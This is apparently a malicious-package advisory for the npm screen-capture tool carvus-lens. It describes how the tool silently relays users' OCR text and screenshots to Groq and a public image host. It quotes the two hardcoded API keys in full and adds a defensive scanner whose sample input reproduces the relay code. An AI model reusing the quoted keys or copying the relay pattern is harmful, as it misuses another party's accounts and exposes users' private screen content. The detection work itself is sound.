-= Per source details. Do not edit below this line.=-
carvus-lens is a screen-capture/OCR Electron-style tool whose advertised 'Ask AI', 'Translate', and 'Search' features silently route user-selected screen content to two third-party services chosen by the author, not by the user. The README discloses neither intermediary.

render.js line 4 hardcodes GROQ_API_KEY = "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", and the queryGroq function POSTs the OCR'd text to https://api.groq.com/openai/v1/chat/completions with the header Authorization: Bearer ${GROQ_API_KEY}, so every user's selected screen text flows into Groq under the author's account.

render.js line 5 hardcodes IMG_HOST_KEY = "6d207e02198a847aa98d0a2a901485a5", and uploadImage POSTs the cropped screenshot to https://freeimage.host/api/1/upload?key=${IMG_HOST_KEY}. Screenshots may contain messages, documents, code, or banking content; they are stored under the author's freeimage.host account and are publicly accessible, and the resulting public URL is then handed to lens.google.com.

Two compounding issues:
(1) Silent relay: normal use of the advertised features exfiltrates user screen content to author-chosen destinations the user never selected.
(2) Credential redistribution: both API keys are extractable from the shipped client code, so anyone who installs the package can bill Groq usage to the author's account or upload arbitrary content to the author's freeimage.host account.
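As an added triage example (this is not code from carvus-lens or its author, and the function and constant names are mine): a small Node.js scan that flags the two patterns described above in a JavaScript bundle, string literals bound to credential-looking identifiers and the outbound request hosts those credentials are sent to. The input it runs on is a constructed stand-in for render.js whose key values are placeholders of the same shape as the quoted ones, not the real keys; the exact lens.google.com endpoint in it is assumed, and the URL-to-credential correlation (a URL literal that embeds the name, else the nearest URL literal within LOOKBACK characters before the use) is a heuristic chosen here, not an analysis method from the record.

```javascript
// Added triage example, not code from carvus-lens: statically flag string
// literals bound to credential-looking identifiers in a JS bundle and the
// outbound request hosts those credentials are sent to. Regex-based, so it is
// a first-pass aid for reviewing an extracted package tarball, not a parser.

// `const|let|var NAME = "literal"` where NAME contains KEY, TOKEN or SECRET.
const SECRET_DECL = /\b(?:const|let|var)\s+([A-Za-z0-9_]*(?:KEY|TOKEN|SECRET)[A-Za-z0-9_]*)\s*=\s*(["'`])([^"'`\n]+)\2/g;
// Any quoted http(s) URL, including template literals with ${...} inside.
const URL_LITERAL = /(["'`])(https?:\/\/[^"'`\s]+)\1/g;
// Heuristic: request headers are normally built just after the URL in a fetch() call.
const LOOKBACK = 300;

// Known credential shapes; anything else is still reported, as an opaque literal.
const KEY_SHAPES = [
  { label: 'groq-api-key', re: /^gsk_[A-Za-z0-9]{40,}$/ },
  { label: 'hex-32', re: /^[0-9a-f]{32}$/i },
];

function classifyLiteral(value) {
  const hit = KEY_SHAPES.find((s) => s.re.test(value));
  return hit ? hit.label : 'opaque-literal';
}

function hostOf(url) {
  const m = /^https?:\/\/([^\/?#]+)/.exec(url);
  return m ? m[1].toLowerCase() : null;
}

// Returns { findings, hosts }: one finding per hardcoded credential with the
// hosts it is relayed to, plus every outbound host seen in the source.
function scanSource(src, allowedHosts = []) {
  const endpoints = [...src.matchAll(URL_LITERAL)].map((m) => ({
    host: hostOf(m[2]), start: m.index, end: m.index + m[0].length,
  }));
  const findings = [];
  for (const d of src.matchAll(SECRET_DECL)) {
    const [decl, name, , value] = d;
    const hosts = new Set();
    for (const u of src.matchAll(new RegExp('\\b' + name + '\\b', 'g'))) {
      if (u.index >= d.index && u.index < d.index + decl.length) continue; // the declaration itself
      // A URL literal that embeds the credential (?key=${...}) wins; otherwise the
      // nearest URL literal shortly before the use (Authorization: Bearer ${...}).
      const containing = endpoints.find((e) => u.index > e.start && u.index < e.end);
      const preceding = endpoints.filter((e) => e.end <= u.index && u.index - e.end <= LOOKBACK).pop();
      const linked = containing || preceding;
      if (linked && linked.host) hosts.add(linked.host);
    }
    findings.push({
      name,
      shape: classifyLiteral(value),
      length: value.length,
      relayHosts: [...hosts].filter((h) => !allowedHosts.includes(h)),
    });
  }
  return { findings, hosts: [...new Set(endpoints.map((e) => e.host))] };
}

// Constructed stand-in for the render.js described above. The key values are
// placeholders of the same shape as the quoted ones, not the real keys, and the
// exact Lens endpoint is assumed.
const SAMPLE = [
  'const GROQ_API_KEY = "gsk_0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOP";',
  'const IMG_HOST_KEY = "00112233445566778899aabbccddeeff";',
  'async function queryGroq(text) {',
  '  const r = await fetch("https://api.groq.com/openai/v1/chat/completions", {',
  '    method: "POST",',
  '    headers: { Authorization: `Bearer ${GROQ_API_KEY}`, "Content-Type": "application/json" },',
  '    body: JSON.stringify({ messages: [{ role: "user", content: text }] }),',
  '  });',
  '  return r.json();',
  '}',
  'async function uploadImage(blob) {',
  '  const fd = new FormData(); fd.append("source", blob);',
  '  const r = await fetch(`https://freeimage.host/api/1/upload?key=${IMG_HOST_KEY}`, { method: "POST", body: fd });',
  '  const { image } = await r.json();',
  '  return "https://lens.google.com/uploadbyurl?url=" + encodeURIComponent(image.url);',
  '}',
].join('\n');

console.log(JSON.stringify(scanSource(SAMPLE), null, 2));
```

To run it against the real artifact, extract carvus-lens-1.0.1.tgz (npm tarballs unpack into a package/ directory) and replace SAMPLE with the contents of package/render.js; the allowedHosts argument is there so a host the package legitimately needs can be excluded from relayHosts without hiding it from the overall hosts list. The regexes will miss keys assembled at runtime or names that avoid KEY/TOKEN/SECRET, so treat an empty result as "nothing obvious", not as a clean bill.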
{
"malicious-packages-origins": [
{
"sha256": "968a2b019b04b046715850d25dc90c586ba5b44f2fc6f7340ece0e29aaef3ec0",
"versions": [
"1.0.1"
],
"source": "amazon-inspector",
"modified_time": "2026-05-20T01:31:26Z",
"id": "IN-MAL-2026-003363",
"import_time": "2026-05-26T05:50:29.853645161Z"
},
{
"sha256": "be2182b552b0a8359f3314078d48310cfcd57738e1934aacf00ac8775a32cfe0",
"versions": [
"1.0.1"
],
"source": "amazon-inspector",
"modified_time": "2026-05-20T01:31:25Z",
"import_time": "2026-05-26T05:50:29.755053451Z",
"id": "IN-MAL-2026-003362"
}
]
}
{
"package_integrity": [
{
"filename": "carvus-lens-1.0.1.tgz",
"hashes": {
"sha512_sri": "sha512-yPwPZybRCC2+UaGCo55du9dVRsBMM6mfobnpKNsE/Sx6GEetUTRdbGqZJweep2NnjeTdDH0ugIUix2RIIh3Jhw==",
"sha1": "5bed35dcada1d3b808d64ebdb73f6b82473f5355"
}
}
],
"evidence_files": [
{
"sha256": "e12697cb803002a86996658e7950e235e3cac99bf7ed93e27da0db86775ae1cc",
"tlsh": "d1b2863a72b2093ef167d07e6b8b6118b9217003390eee08794c72448fdd99995f6bf5",
"path": "render.js"
}
],
"domains": [
"github.com",
"release-assets.githubusercontent.com"
]
}
"https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/carvus-lens/MAL-2026-4505.json"
[
{
"name": "Embedded Malicious Code",
"cweId": "CWE-506",
"description": "The product contains code that appears to be malicious in nature."
}
]